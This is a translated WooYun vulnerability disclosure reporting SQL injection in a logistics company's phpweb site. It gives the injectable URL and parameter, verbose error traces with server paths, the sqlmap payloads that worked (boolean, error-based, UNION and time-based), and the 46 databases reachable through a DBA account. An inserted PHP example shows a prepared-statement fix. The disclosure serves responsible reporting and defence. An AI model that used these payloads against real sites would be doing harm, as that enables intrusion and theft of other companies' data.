Vulnerability summary

Defect ID: wooyun-2014-071739

Title: SQL injection in a logistics website allows a full database dump, affecting nearly 20 logistics sites

Vendor: szpsun56.com

Author: Moo

Submitted: 2014-08-11 11:42

Fix deadline: 2014-09-25 11:44

Published: 2014-09-25 11:44

Type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: handed over to a third-party partner organization (CNCERT, the National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or help contact [email protected]


Vulnerability details

Disclosure status:

2014-08-11: details sent to the vendor, awaiting vendor handling
2014-08-16: vendor confirmed; details visible to the vendor only
2014-08-26: details opened to core white hats and domain experts
2014-09-05: details opened to regular white hats
2014-09-15: details opened to intern white hats
2014-09-25: details opened to the public

Brief description:

As in the title.
root privileges.
A full database dump, involving several logistics companies.
Each database name maps directly to a site domain: www.<dbname>.com

Detailed description:

Site: www.szpsun56.com
URL that triggers the SQL error:

http://www.szpsun56.com/news/html/?518.html


Appending a backslash produces an error:

Database error: Invalid SQL: select * from pwn_news_con where id='518\' limit 0,1
MySQL Error: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''518\' limit 0,1' at line 1)
#0 dbbase_sql->halt(Invalid SQL: select * from pwn_news_con where id='518\' limit 0,1) called at [D:\web\yewu\苏州排尚物流\includes\db.inc.php:55]
#1 dbbase_sql->query(select * from {P}_news_con where id='518\' limit 0,1) called at [D:\web\yewu\苏州排尚物流\news\includes\news.inc.php:36]
#2 NewsToUrl() called at [D:\web\yewu\苏州排尚物流\news\html\index.php:8]

Database error: Invalid SQL: select title from pwn_news_con where id='518\'
MySQL Error: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''518\'' at line 1)
#0 dbbase_sql->halt(Invalid SQL: select title from pwn_news_con where id='518\') called at [D:\web\yewu\苏州排尚物流\includes\db.inc.php:55]
#1 dbbase_sql->query(select title from {P}_news_con where id='518\') called at [D:\web\yewu\苏州排尚物流\news\module\NewsNavPath.php:101]
#2 NewsNavPath() called at [D:\web\yewu\苏州排尚物流\includes\common.inc.php:524]
#3 PrintPage() called at [D:\web\yewu\苏州排尚物流\news\html\index.php:15]

Database error: Invalid SQL: select * from pwn_news_con where id='518\'
MySQL Error: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''518\'' at line 1)
#0 dbbase_sql->halt(Invalid SQL: select * from pwn_news_con where id='518\') called at [D:\web\yewu\苏州排尚物流\includes\db.inc.php:55]
#1 dbbase_sql->query(select * from {P}_news_con where id='518\') called at [D:\web\yewu\苏州排尚物流\news\module\NewsContent.php:34]
#2 NewsContent() called at [D:\web\yewu\苏州排尚物流\includes\common.inc.php:524]
#3 PrintPage() called at [D:\web\yewu\苏州排尚物流\news\html\index.php:15]


The equivalent un-rewritten URL:

http://www.szpsun56.com/news/html/index.php?id=518


Looks like the phpweb hole. The vendor's last official patch filters single quotes, so they all come through as %27 now...
Since the single quote cannot be used directly, refer to the single-quote bypass techniques.
The privilege level is rather high.
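The error output above shows the id parameter spliced into the query string (`where id='518\'`), and the report notes that a patch which merely filters single quotes did not close the hole. As an added example (not phpweb's code and not the report author's), here is that lookup rebuilt with an integer check and a prepared statement, shown beside the concatenation pattern the error implies. The table name pwn_news_con and the id parameter come from the report; the DSN, credentials and function names are placeholders.

```php
<?php
// Added example, not phpweb's code. Table pwn_news_con and the id
// parameter are taken from the report; everything else is a placeholder.

// Pattern implied by the reported error: the raw request value is
// concatenated into the SQL string. Escaping or stripping quotes in the
// request layer does not fix this, because the value is still parsed as
// part of the SQL text (the report shows %27-encoded quotes still reaching
// the query after the vendor's quote filter was added).
function fetch_news_vulnerable(mysqli $db, $id)
{
    $sql = "select * from pwn_news_con where id='" . $id . "' limit 0,1";
    return $db->query($sql);
}

// Hardened form: validate the type the application actually expects, then
// bind the value so the database receives it as data, never as SQL text.
function fetch_news_safe(PDO $db, $id)
{
    // News ids are numeric (?518.html -> index.php?id=518); reject anything else.
    if (!ctype_digit((string) $id)) {
        return null;
    }
    $stmt = $db->prepare('SELECT * FROM pwn_news_con WHERE id = :id LIMIT 1');
    $stmt->bindValue(':id', (int) $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Placeholder connection details; the real values live in the site config.
// A dedicated low-privilege account per site database (no DBA/root) limits
// what any single injection could reach on a shared server.
$pdo = new PDO('mysql:host=127.0.0.1;dbname=PLACEHOLDER_DB', 'PLACEHOLDER_USER', 'PLACEHOLDER_PASS');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
// Use server-side prepares so the driver never rebuilds the SQL string itself.
$pdo->setAttribute(PDO::ATTR_EMULATE_PREPARES, false);

try {
    $row = fetch_news_safe($pdo, isset($_GET['id']) ? $_GET['id'] : '');
    if ($row === null) {
        header('HTTP/1.1 404 Not Found');
        exit;
    }
    // ... render $row ...
} catch (PDOException $e) {
    // Log server-side only; the verbose SQL and path disclosure in the
    // report is what made the injection trivial to confirm.
    error_log($e->getMessage());
    header('HTTP/1.1 500 Internal Server Error');
    exit;
}
```

Two points from the report drive the design: the application user is a DBA (`current user is DBA: True`), which is why one injection exposes 46 databases belonging to different companies, so each site should connect with its own minimally privileged account; and the full error text, including SQL and file paths, is returned to the client, so display_errors should be off in production and failures logged server-side instead.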

web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.2.17
back-end DBMS: MySQL 5.0
current user is DBA: True


[Screenshot: QQ截图20140809192821.png]


Proof of vulnerability:

[19:20:42] [INFO] retrieved: "",""
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] n
do you want to perform a dictionary-based attack against retrieved password hashes? [Y/n/q] n
database management system user


Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=518' AND 8992=8992 AND 'SvZD'='SvZD
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=518' AND (SELECT 2420 FROM(SELECT COUNT(*),CONCAT(0x716f646871,(SELECT (CASE WHEN (2420=2420) THEN 1 ELSE 0 END)),0x7162676d71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'XPfj'='XPfj
Type: UNION query
Title: MySQL UNION query (NULL) - 1 column
Payload: id=-5917' UNION ALL SELECT CONCAT(0x716f646871,0x66646d46727573796d4b,0x7162676d71)#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=518' AND SLEEP(5) AND 'cxmb'='cxmb
---
[19:11:24] [INFO] the back-end DBMS is MySQL
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.2.17
back-end DBMS: MySQL 5.0


available databases [46]:
[*] 021jadever
[*] 0551kyaji
[*] 0817jp
[*] 0817yt
[*] aaa
[*] abc
[*] baiqiang
[*] ceshi
[*] dataiyaojt
[*] df999pme
[*] fsmbhj
[*] fsrattanjiaju
[*] gjlpf
[*] huaan56
[*] information_schema
[*] jadever021
[*] kmxydn
[*] men
[*] menjing
[*] minshi56
[*] mysql
[*] nchszs
[*] nczxsj
[*] qiyezhan
[*] sdyspme
[*] shoulianqingxin
[*] sjgzs
[*] suheng
[*] sz56at
[*] sz56stg
[*] szjl56
[*] szksdwl
[*] szpsun56
[*] szta
[*] szta56
[*] szxdwl
[*] szxt56
[*] tengyi
[*] test
[*] tfpme
[*] wordpress
[*] wxjz56
[*] xiaoai
[*] yiliao
[*] zssj
[*] ztuowl

Fix recommendation:

.......

Copyright notice: please credit Moo@WooYun when reposting.


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 14

Confirmed at: 2014-08-16 08:34

Vendor reply:

Latest status:

2014-08-20: Update on handling: CNVD confirmed and reproduced the described issue, and has notified the site operator by email through the site's public contact channels.


Comments

  1. 2014-12-28 15:16 | 天明 ( Intern white hat | Rank:59 Vulns:17 | I want to avenge the uncle. )

    Author, could you explain in detail how you bypassed it?